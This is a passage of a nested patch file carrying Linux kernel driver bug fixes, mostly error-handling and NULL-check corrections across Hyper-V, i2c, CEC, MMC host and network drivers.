+-	r = radeon_gem_handle_lockup(robj->rdev, r);
++	r = radeon_gem_handle_lockup(rdev, r);
+ 	return r;
+ }
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index fb538a6c4add8..aff4a21a46b6a 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2417,8 +2417,13 @@ static int wacom_parse_and_register(struct wacom *wacom, bool wireless)
+ 		goto fail_quirks;
+ 	}
+ 
+-	if (features->device_type & WACOM_DEVICETYPE_WL_MONITOR)
++	if (features->device_type & WACOM_DEVICETYPE_WL_MONITOR) {
+ 		error = hid_hw_open(hdev);
++		if (error) {
++			hid_err(hdev, "hw open failed\n");
++			goto fail_quirks;
++		}
++	}
+ 
+ 	wacom_set_shared_values(wacom_wac);
+ 	devres_close_group(&hdev->dev, wacom);
+diff --git a/drivers/hv/channel_mgmt.c b/drivers/hv/channel_mgmt.c
+index cc23b90cae02f..d95e567a190d2 100644
+--- a/drivers/hv/channel_mgmt.c
++++ b/drivers/hv/channel_mgmt.c
+@@ -829,11 +829,22 @@ static void vmbus_wait_for_unload(void)
+ 		if (completion_done(&vmbus_connection.unload_event))
+ 			goto completed;
+ 
+-		for_each_online_cpu(cpu) {
++		for_each_present_cpu(cpu) {
+ 			struct hv_per_cpu_context *hv_cpu
+ 				= per_cpu_ptr(hv_context.cpu_context, cpu);
+ 
++			/*
++			 * In a CoCo VM the synic_message_page is not allocated
++			 * in hv_synic_alloc(). Instead it is set/cleared in
++			 * hv_synic_enable_regs() and hv_synic_disable_regs()
++			 * such that it is set only when the CPU is online. If
++			 * not all present CPUs are online, the message page
++			 * might be NULL, so skip such CPUs.
++			 */
+ 			page_addr = hv_cpu->synic_message_page;
++			if (!page_addr)
++				continue;
++
+ 			msg = (struct hv_message *)page_addr
+ 				+ VMBUS_MESSAGE_SINT;
+ 
+@@ -867,11 +878,14 @@ completed:
+ 	 * maybe-pending messages on all CPUs to be able to receive new
+ 	 * messages after we reconnect.
+ 	 */
+-	for_each_online_cpu(cpu) {
++	for_each_present_cpu(cpu) {
+ 		struct hv_per_cpu_context *hv_cpu
+ 			= per_cpu_ptr(hv_context.cpu_context, cpu);
+ 
+ 		page_addr = hv_cpu->synic_message_page;
++		if (!page_addr)
++			continue;
++
+ 		msg = (struct hv_message *)page_addr + VMBUS_MESSAGE_SINT;
+ 		msg->header.message_type = HVMSG_NONE;
+ 	}
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index e592c481f7aee..b03cb7ae7fd38 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -1504,7 +1504,7 @@ static int vmbus_bus_init(void)
+ 	ret = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hyperv/vmbus:online",
+ 				hv_synic_init, hv_synic_cleanup);
+ 	if (ret < 0)
+-		goto err_cpuhp;
++		goto err_alloc;
+ 	hyperv_cpuhp_online = ret;
+ 
+ 	ret = vmbus_connect();
+@@ -1555,9 +1555,8 @@ static int vmbus_bus_init(void)
+ 
+ err_connect:
+ 	cpuhp_remove_state(hyperv_cpuhp_online);
+-err_cpuhp:
+-	hv_synic_free();
+ err_alloc:
++	hv_synic_free();
+ 	if (vmbus_irq == -1) {
+ 		hv_remove_vmbus_handler();
+ 	} else {
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index a49b14d52a986..ff12018bc2060 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -201,8 +201,8 @@ static void lpi2c_imx_stop(struct lpi2c_imx_struct *lpi2c_imx)
+ /* CLKLO = I2C_CLK_RATIO * CLKHI, SETHOLD = CLKHI, DATAVD = CLKHI/2 */
+ static int lpi2c_imx_config(struct lpi2c_imx_struct *lpi2c_imx)
+ {
+-	u8 prescale, filt, sethold, clkhi, clklo, datavd;
+-	unsigned int clk_rate, clk_cycle;
++	u8 prescale, filt, sethold, datavd;
++	unsigned int clk_rate, clk_cycle, clkhi, clklo;
+ 	enum lpi2c_imx_pincfg pincfg;
+ 	unsigned int temp;
+ 
+diff --git a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+index b21ffd6df9276..5ef136c3ecb12 100644
+--- a/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
++++ b/drivers/i2c/busses/i2c-mchp-pci1xxxx.c
+@@ -1118,8 +1118,10 @@ static int pci1xxxx_i2c_resume(struct device *dev)
+ static DEFINE_SIMPLE_DEV_PM_OPS(pci1xxxx_i2c_pm_ops, pci1xxxx_i2c_suspend,
+ 			 pci1xxxx_i2c_resume);
+ 
+-static void pci1xxxx_i2c_shutdown(struct pci1xxxx_i2c *i2c)
++static void pci1xxxx_i2c_shutdown(void *data)
+ {
++	struct pci1xxxx_i2c *i2c = data;
++
+ 	pci1xxxx_i2c_config_padctrl(i2c, false);
+ 	pci1xxxx_i2c_configure_core_reg(i2c, false);
+ }
+@@ -1156,7 +1158,7 @@ static int pci1xxxx_i2c_probe_pci(struct pci_dev *pdev,
+ 	init_completion(&i2c->i2c_xfer_done);
+ 	pci1xxxx_i2c_init(i2c);
+ 
+-	ret = devm_add_action(dev, (void (*)(void *))pci1xxxx_i2c_shutdown, i2c);
++	ret = devm_add_action(dev, pci1xxxx_i2c_shutdown, i2c);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/input/misc/soc_button_array.c b/drivers/input/misc/soc_button_array.c
+index 09489380afda7..e79f5497948b8 100644
+--- a/drivers/input/misc/soc_button_array.c
++++ b/drivers/input/misc/soc_button_array.c
+@@ -108,6 +108,27 @@ static const struct dmi_system_id dmi_use_low_level_irq[] = {
+ 	{} /* Terminating entry */
+ };
+ 
++/*
++ * Some devices have a wrong entry which points to a GPIO which is
++ * required in another driver, so this driver must not claim it.
++ */
++static const struct dmi_system_id dmi_invalid_acpi_index[] = {
++	{
++		/*
++		 * Lenovo Yoga Book X90F / X90L, the PNP0C40 home button entry
++		 * points to a GPIO which is not a home button and which is
++		 * required by the lenovo-yogabook driver.
++		 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)1l,
++	},
++	{} /* Terminating entry */
++};
++
+ /*
+  * Get the Nth GPIO number from the ACPI object.
+  */
+@@ -137,6 +158,8 @@ soc_button_device_create(struct platform_device *pdev,
+ 	struct platform_device *pd;
+ 	struct gpio_keys_button *gpio_keys;
+ 	struct gpio_keys_platform_data *gpio_keys_pdata;
++	const struct dmi_system_id *dmi_id;
++	int invalid_acpi_index = -1;
+ 	int error, gpio, irq;
+ 	int n_buttons = 0;
+ 
+@@ -154,10 +177,17 @@ soc_button_device_create(struct platform_device *pdev,
+ 	gpio_keys = (void *)(gpio_keys_pdata + 1);
+ 	n_buttons = 0;
+ 
++	dmi_id = dmi_first_match(dmi_invalid_acpi_index);
++	if (dmi_id)
++		invalid_acpi_index = (long)dmi_id->driver_data;
++
+ 	for (info = button_info; info->name; info++) {
+ 		if (info->autorepeat != autorepeat)
+ 			continue;
+ 
++		if (info->acpi_index == invalid_acpi_index)
++			continue;
++
+ 		error = soc_button_lookup_gpio(&pdev->dev, info->acpi_index, &gpio, &irq);
+ 		if (error || irq < 0) {
+ 			/*
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index 4f5ab3cae8a71..b1512f9c5895c 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -1090,7 +1090,8 @@ void cec_received_msg_ts(struct cec_adapter *adap,
+ 	mutex_lock(&adap->lock);
+ 	dprintk(2, "%s: %*ph\n", __func__, msg->len, msg->msg);
+ 
+-	adap->last_initiator = 0xff;
++	if (!adap->transmit_in_progress)
++		adap->last_initiator = 0xff;
+ 
+ 	/* Check if this message was for us (directed or broadcast). */
+ 	if (!cec_msg_is_broadcast(msg))
+@@ -1582,7 +1583,7 @@ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+  *
+  * This function is called with adap->lock held.
+  */
+-static int cec_adap_enable(struct cec_adapter *adap)
++int cec_adap_enable(struct cec_adapter *adap)
+ {
+ 	bool enable;
+ 	int ret = 0;
+@@ -1592,6 +1593,9 @@ static int cec_adap_enable(struct cec_adapter *adap)
+ 	if (adap->needs_hpd)
+ 		enable = enable && adap->phys_addr != CEC_PHYS_ADDR_INVALID;
+ 
++	if (adap->devnode.unregistered)
++		enable = false;
++
+ 	if (enable == adap->is_enabled)
+ 		return 0;
+ 
+diff --git a/drivers/media/cec/core/cec-core.c b/drivers/media/cec/core/cec-core.c
+index af358e901b5f3..7e153c5cad04f 100644
+--- a/drivers/media/cec/core/cec-core.c
++++ b/drivers/media/cec/core/cec-core.c
+@@ -191,6 +191,8 @@ static void cec_devnode_unregister(struct cec_adapter *adap)
+ 	mutex_lock(&adap->lock);
+ 	__cec_s_phys_addr(adap, CEC_PHYS_ADDR_INVALID, false);
+ 	__cec_s_log_addrs(adap, NULL, false);
++	// Disable the adapter (since adap->devnode.unregistered is true)
++	cec_adap_enable(adap);
+ 	mutex_unlock(&adap->lock);
+ 
+ 	cdev_device_del(&devnode->cdev, &devnode->dev);
+diff --git a/drivers/media/cec/core/cec-priv.h b/drivers/media/cec/core/cec-priv.h
+index b78df931aa74b..ed1f8c67626bf 100644
+--- a/drivers/media/cec/core/cec-priv.h
++++ b/drivers/media/cec/core/cec-priv.h
+@@ -47,6 +47,7 @@ int cec_monitor_pin_cnt_inc(struct cec_adapter *adap);
+ void cec_monitor_pin_cnt_dec(struct cec_adapter *adap);
+ int cec_adap_status(struct seq_file *file, void *priv);
+ int cec_thread_func(void *_adap);
++int cec_adap_enable(struct cec_adapter *adap);
+ void __cec_s_phys_addr(struct cec_adapter *adap, u16 phys_addr, bool block);
+ int __cec_s_log_addrs(struct cec_adapter *adap,
+ 		      struct cec_log_addrs *log_addrs, bool block);
+diff --git a/drivers/mmc/host/bcm2835.c b/drivers/mmc/host/bcm2835.c
+index 641ab4f42125b..c15226be4d2a2 100644
+--- a/drivers/mmc/host/bcm2835.c
++++ b/drivers/mmc/host/bcm2835.c
+@@ -1411,8 +1411,8 @@ static int bcm2835_probe(struct platform_device *pdev)
+ 	host->max_clk = clk_get_rate(clk);
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto err;
+ 	}
+ 
+diff --git a/drivers/mmc/host/litex_mmc.c b/drivers/mmc/host/litex_mmc.c
+index 39c6707fdfdbc..9af6b0902efe1 100644
+--- a/drivers/mmc/host/litex_mmc.c
++++ b/drivers/mmc/host/litex_mmc.c
+@@ -649,6 +649,7 @@ static struct platform_driver litex_mmc_driver = {
+ 	.driver = {
+ 		.name = "litex-mmc",
+ 		.of_match_table = litex_match,
++		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
+ 	},
+ };
+ module_platform_driver(litex_mmc_driver);
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 5c94ad4661ce3..0f39f86bd0c26 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -1007,11 +1007,8 @@ static irqreturn_t meson_mmc_irq(int irq, void *dev_id)
+ 
+ 		if (data && !cmd->error)
+ 			data->bytes_xfered = data->blksz * data->blocks;
+-		if (meson_mmc_bounce_buf_read(data) ||
+-		    meson_mmc_get_next_command(cmd))
+-			ret = IRQ_WAKE_THREAD;
+-		else
+-			ret = IRQ_HANDLED;
++
++		return IRQ_WAKE_THREAD;
+ 	}
+ 
+ out:
+@@ -1023,9 +1020,6 @@ out:
+ 		writel(start, host->regs + SD_EMMC_START);
+ 	}
+ 
+-	if (ret == IRQ_HANDLED)
+-		meson_mmc_request_done(host->mmc, cmd->mrq);
+-
+ 	return ret;
+ }
+ 
+@@ -1233,8 +1227,8 @@ static int meson_mmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto free_host;
+ 	}
+ 
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index b9e5dfe74e5c7..1c326e4307f4a 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -1735,7 +1735,8 @@ static void mmci_set_max_busy_timeout(struct mmc_host *mmc)
+ 		return;
+ 
+ 	if (host->variant->busy_timeout && mmc->actual_clock)
+-		max_busy_timeout = ~0UL / (mmc->actual_clock / MSEC_PER_SEC);
++		max_busy_timeout = U32_MAX / DIV_ROUND_UP(mmc->actual_clock,
++							  MSEC_PER_SEC);
+ 
+ 	mmc->max_busy_timeout = max_busy_timeout;
+ }
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 26bc59b5a7ccf..425efb3fba048 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -2658,7 +2658,7 @@ static int msdc_drv_probe(struct platform_device *pdev)
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+ 	if (host->irq < 0) {
+-		ret = -EINVAL;
++		ret = host->irq;
+ 		goto host_free;
+ 	}
+ 
+diff --git a/drivers/mmc/host/mvsdio.c b/drivers/mmc/host/mvsdio.c
+index 629efbe639c4f..b4f6a0a2fcb51 100644
+--- a/drivers/mmc/host/mvsdio.c
++++ b/drivers/mmc/host/mvsdio.c
+@@ -704,7 +704,7 @@ static int mvsd_probe(struct platform_device *pdev)
+ 	}
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+-		return -ENXIO;
++		return irq;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct mvsd_host), &pdev->dev);
+ 	if (!mmc) {
+diff --git a/drivers/mmc/host/omap.c b/drivers/mmc/host/omap.c
+index 57d39283924da..cc2213ea324f1 100644
+--- a/drivers/mmc/host/omap.c
++++ b/drivers/mmc/host/omap.c
+@@ -1343,7 +1343,7 @@ static int mmc_omap_probe(struct platform_device *pdev)
+ 
+ 	irq = platform_get_irq(pdev, 0);
+ 	if (irq < 0)
+-		return -ENXIO;
++		return irq;
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	host->virt_base = devm_ioremap_resource(&pdev->dev, res);
+diff --git a/drivers/mmc/host/omap_hsmmc.c b/drivers/mmc/host/omap_hsmmc.c
+index 4bd7447552055..2db3a16e63c48 100644
+--- a/drivers/mmc/host/omap_hsmmc.c
++++ b/drivers/mmc/host/omap_hsmmc.c
+@@ -1791,9 +1791,11 @@ static int omap_hsmmc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	irq = platform_get_irq(pdev, 0);
+-	if (res == NULL || irq < 0)
++	if (!res)
+ 		return -ENXIO;
++	irq = platform_get_irq(pdev, 0);
++	if (irq < 0)
++		return irq;
+ 
+ 	base = devm_ioremap_resource(&pdev->dev, res);
+ 	if (IS_ERR(base))
+diff --git a/drivers/mmc/host/owl-mmc.c b/drivers/mmc/host/owl-mmc.c
+index 3dc143b039397..679b8b0b310e5 100644
+--- a/drivers/mmc/host/owl-mmc.c
++++ b/drivers/mmc/host/owl-mmc.c
+@@ -638,7 +638,7 @@ static int owl_mmc_probe(struct platform_device *pdev)
+ 
+ 	owl_host->irq = platform_get_irq(pdev, 0);
+ 	if (owl_host->irq < 0) {
+-		ret = -EINVAL;
++		ret = owl_host->irq;
+ 		goto err_release_channel;
+ 	}
+ 
+diff --git a/drivers/mmc/host/sdhci-acpi.c b/drivers/mmc/host/sdhci-acpi.c
+index 4cca4c90769bc..b917060a258a4 100644
+--- a/drivers/mmc/host/sdhci-acpi.c
++++ b/drivers/mmc/host/sdhci-acpi.c
+@@ -829,7 +829,7 @@ static int sdhci_acpi_probe(struct platform_device *pdev)
+ 	host->ops	= &sdhci_acpi_ops_dflt;
+ 	host->irq	= platform_get_irq(pdev, 0);
+ 	if (host->irq < 0) {
+-		err = -EINVAL;
++		err = host->irq;
+ 		goto err_free;
+ 	}
+ 
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index 3a091a387ecbc..a5ab2af3e5201 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2486,6 +2486,9 @@ static inline void sdhci_msm_get_of_property(struct platform_device *pdev,
+ 		msm_host->ddr_config = DDR_CONFIG_POR_VAL;
+ 
+ 	of_property_read_u32(node, "qcom,dll-config", &msm_host->dll_config);
++
++	if (of_device_is_compatible(node, "qcom,msm8916-sdhci"))
++		host->quirks2 |= SDHCI_QUIRK2_BROKEN_64_BIT_DMA;
+ }
+ 
+ static int sdhci_msm_gcc_reset(struct device *dev, struct sdhci_host *host)
+diff --git a/drivers/mmc/host/sdhci-spear.c b/drivers/mmc/host/sdhci-spear.c
+index d463e2fd5b1a8..c79035727b20b 100644
+--- a/drivers/mmc/host/sdhci-spear.c
++++ b/drivers/mmc/host/sdhci-spear.c
+@@ -65,8 +65,8 @@ static int sdhci_probe(struct platform_device *pdev)
+ 	host->hw_name = "sdhci";
+ 	host->ops = &sdhci_pltfm_ops;
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto err_host;
+ 	}
+ 	host->quirks = SDHCI_QUIRK_BROKEN_ADMA;
+diff --git a/drivers/mmc/host/sh_mmcif.c b/drivers/mmc/host/sh_mmcif.c
+index 0fd4c9d644dd5..5cf53348372a4 100644
+--- a/drivers/mmc/host/sh_mmcif.c
++++ b/drivers/mmc/host/sh_mmcif.c
+@@ -1400,7 +1400,7 @@ static int sh_mmcif_probe(struct platform_device *pdev)
+ 	irq[0] = platform_get_irq(pdev, 0);
+ 	irq[1] = platform_get_irq_optional(pdev, 1);
+ 	if (irq[0] < 0)
+-		return -ENXIO;
++		return irq[0];
+ 
+ 	reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(reg))
+diff --git a/drivers/mmc/host/sunxi-mmc.c b/drivers/mmc/host/sunxi-mmc.c
+index 3db9f32d6a7b9..69dcb8805e05f 100644
+--- a/drivers/mmc/host/sunxi-mmc.c
++++ b/drivers/mmc/host/sunxi-mmc.c
+@@ -1350,8 +1350,8 @@ static int sunxi_mmc_resource_request(struct sunxi_mmc_host *host,
+ 		return ret;
+ 
+ 	host->irq = platform_get_irq(pdev, 0);
+-	if (host->irq <= 0) {
+-		ret = -EINVAL;
++	if (host->irq < 0) {
++		ret = host->irq;
+ 		goto error_disable_mmc;
+ 	}
+ 
+diff --git a/drivers/mmc/host/usdhi6rol0.c b/drivers/mmc/host/usdhi6rol0.c
+index 99515be6e5e57..2032e4e1ee68b 100644
+--- a/drivers/mmc/host/usdhi6rol0.c
++++ b/drivers/mmc/host/usdhi6rol0.c
+@@ -1757,8 +1757,10 @@ static int usdhi6_probe(struct platform_device *pdev)
+ 	irq_cd = platform_get_irq_byname(pdev, "card detect");
+ 	irq_sd = platform_get_irq_byname(pdev, "data");
+ 	irq_sdio = platform_get_irq_byname(pdev, "SDIO");
+-	if (irq_sd < 0 || irq_sdio < 0)
+-		return -ENODEV;
++	if (irq_sd < 0)
++		return irq_sd;
++	if (irq_sdio < 0)
++		return irq_sdio;
+ 
+ 	mmc = mmc_alloc_host(sizeof(struct usdhi6_host), dev);
+ 	if (!mmc)
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 855220c5ce339..51d2ef0dc835c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,6 +998,18 @@ unlock_exit:
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
++static void
++mt753x_trap_frames(struct mt7530_priv *priv)
++{
++	/* Trap BPDUs to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
++		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
++}
++
+ static int
+ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ {
+@@ -1020,7 +1032,7 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+-	if (priv->id == ID_MT7621)
++	if (priv->id == ID_MT7530 || priv->id == ID_MT7621)
+ 		mt7530_rmw(priv, MT7530_MFC, CPU_MASK, CPU_EN | CPU_PORT(port));
+ 
+ 	/* CPU port gets connected to all user ports of
+@@ -2219,6 +2231,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
++	mt753x_trap_frames(priv);
++
+ 	/* Enable and reset MIB counters */
+ 	mt7530_mib_reset(ds);
+ 
+@@ -2325,8 +2339,8 @@ mt7531_setup_common(struct dsa_switch *ds)
+ 			   BIT(cpu_dp->index));
+ 		break;
+ 	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
++
++	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+ 	mt7530_mib_reset(ds);
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index e8d9664353504..9a45663d8b4ef 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -65,6 +65,11 @@ enum mt753x_id {
+ #define MT753X_BPC			0x24
+ #define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
+ 
++/* Register for :03 and :0E MAC DA frame control */
++#define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++
+ enum mt753x_bpdu_port_fw {
+ 	MT753X_BPDU_FOLLOW_MFC,
+ 	MT753X_BPDU_CPU_EXCLUDE = 4,
+diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c
+index a92a747615466..5d39df8452653 100644
+--- a/drivers/net/ethernet/emulex/benet/be_main.c
++++ b/drivers/net/ethernet/emulex/benet/be_main.c
+@@ -1136,8 +1136,8 @@ static struct sk_buff *be_lancer_xmit_workarounds(struct be_adapter *adapter,
+ 	eth_hdr_len = ntohs(skb->protocol) == ETH_P_8021Q ?
+ 						VLAN_ETH_HLEN : ETH_HLEN;
+ 	if (skb->len <= 60 &&
+-	    (lancer_chip(adapter) || skb_vlan_tag_present(skb)) &&
+-	    is_ipv4_pkt(skb)) {
++	    (lancer_chip(adapter) || BE3_chip(adapter) ||
++	     skb_vlan_tag_present(skb)) && is_ipv4_pkt(skb)) {
+ 		ip = (struct iphdr *)ip_hdr(skb);
+ 		pskb_trim(skb, eth_hdr_len + ntohs(ip->tot_len));
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+index b1dfad274a39e..a3e7602b044e5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+@@ -1200,9 +1200,13 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 	}
+ 	case DR_ACTION_TYP_TNL_L3_TO_L2:
+ 	{
+-		u8 hw_actions[ACTION_CACHE_LINE_SIZE] = {};
++		u8 *hw_actions;
+ 		int ret;
+ 
++		hw_actions = kzalloc(ACTION_CACHE_LINE_SIZE, GFP_KERNEL);
++		if (!hw_actions)
++			return -ENOMEM;
++
+ 		ret = mlx5dr_ste_set_action_decap_l3_list(dmn->ste_ctx,
+ 							  data, data_sz,
+ 							  hw_actions,
+@@ -1210,6 +1214,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 							  &action->rewrite->num_of_actions);
+ 		if (ret) {
+ 			mlx5dr_dbg(dmn, "Failed creating decap l3 action list\n");
++			kfree(hw_actions);
+ 			return ret;
+ 		}
+ 
+@@ -1217,6 +1222,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 								DR_CHUNK_SIZE_8);
+ 		if (!action->rewrite->chunk) {
+ 			mlx5dr_dbg(dmn, "Failed allocating modify header chunk\n");
++			kfree(hw_actions);
+ 			return -ENOMEM;
+ 		}
+ 
+@@ -1230,6 +1236,7 @@ dr_action_create_reformat_action(struct mlx5dr_domain *dmn,
+ 		if (ret) {
+ 			mlx5dr_dbg(dmn, "Writing decap l3 actions to ICM failed\n");
+ 			mlx5dr_icm_free_chunk(action->rewrite->chunk);
++			kfree(hw_actions);
+ 			return ret;
+ 		}
+ 		return 0;
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index c865a4be05eec..4a1b94e5a8ea9 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -582,8 +582,7 @@ qcaspi_spi_thread(void *data)
+ 	while (!kthread_should_stop()) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if ((qca->intr_req == qca->intr_svc) &&
+-		    (qca->txr.skb[qca->txr.head] == NULL) &&
+-		    (qca->sync == QCASPI_SYNC_READY))
++		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+ 
+ 		set_current_state(TASK_RUNNING);
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index d30459dbfe8f8..b63e47af63655 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -2950,7 +2950,7 @@ static u32 efx_ef10_extract_event_ts(efx_qword_t *event)
+ 	return tstamp;
+ }
+ 
+-static void
++static int
+ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ {
+ 	struct efx_nic *efx = channel->efx;
+@@ -2958,13 +2958,14 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	unsigned int tx_ev_desc_ptr;
+ 	unsigned int tx_ev_q_label;
+ 	unsigned int tx_ev_type;
++	int work_done;
+ 	u64 ts_part;
+ 
+ 	if (unlikely(READ_ONCE(efx->reset_pending)))
+-		return;
++		return 0;
+ 
+ 	if (unlikely(EFX_QWORD_FIELD(*event, ESF_DZ_TX_DROP_EVENT)))
+-		return;
++		return 0;
+ 
+ 	/* Get the transmit queue */
+ 	tx_ev_q_label = EFX_QWORD_FIELD(*event, ESF_DZ_TX_QLABEL);
+@@ -2973,8 +2974,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	if (!tx_queue->timestamping) {
+ 		/* Transmit completion */
+ 		tx_ev_desc_ptr = EFX_QWORD_FIELD(*event, ESF_DZ_TX_DESCR_INDX);
+-		efx_xmit_done(tx_queue, tx_ev_desc_ptr & tx_queue->ptr_mask);
+-		return;
++		return efx_xmit_done(tx_queue, tx_ev_desc_ptr & tx_queue->ptr_mask);
+ 	}
+ 
+ 	/* Transmit timestamps are only available for 8XXX series. They result
+@@ -3000,6 +3000,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 	 * fields in the event.
+ 	 */
+ 	tx_ev_type = EFX_QWORD_FIELD(*event, ESF_EZ_TX_SOFT1);
++	work_done = 0;
+ 
+ 	switch (tx_ev_type) {
+ 	case TX_TIMESTAMP_EVENT_TX_EV_COMPLETION:
+@@ -3016,6 +3017,7 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 		tx_queue->completed_timestamp_major = ts_part;
+ 
+ 		efx_xmit_done_single(tx_queue);
++		work_done = 1;
+ 		break;
+ 
+ 	default:
+@@ -3026,6 +3028,8 @@ efx_ef10_handle_tx_event(struct efx_channel *channel, efx_qword_t *event)
+ 			  EFX_QWORD_VAL(*event));
+ 		break;
+ 	}
++
++	return work_done;
+ }
+ 
+ static void
+@@ -3081,13 +3085,16 @@ static void efx_ef10_handle_driver_generated_event(struct efx_channel *channel,
+ 	}
+ }
+ 
++#define EFX_NAPI_MAX_TX 512
++
+ static int efx_ef10_ev_process(struct efx_channel *channel, int quota)
+ {
+ 	struct efx_nic *efx = channel->efx;
+ 	efx_qword_t event, *p_event;
+ 	unsigned int read_ptr;
+-	int ev_code;
++	int spent_tx = 0;
+ 	int spent = 0;
++	int ev_code;
+ 
+ 	if (quota <= 0)
+ 		return spent;
+@@ -3126,7 +3133,11 @@ static int efx_ef10_ev_process(struct efx_channel *channel, int quota)
+ 			}
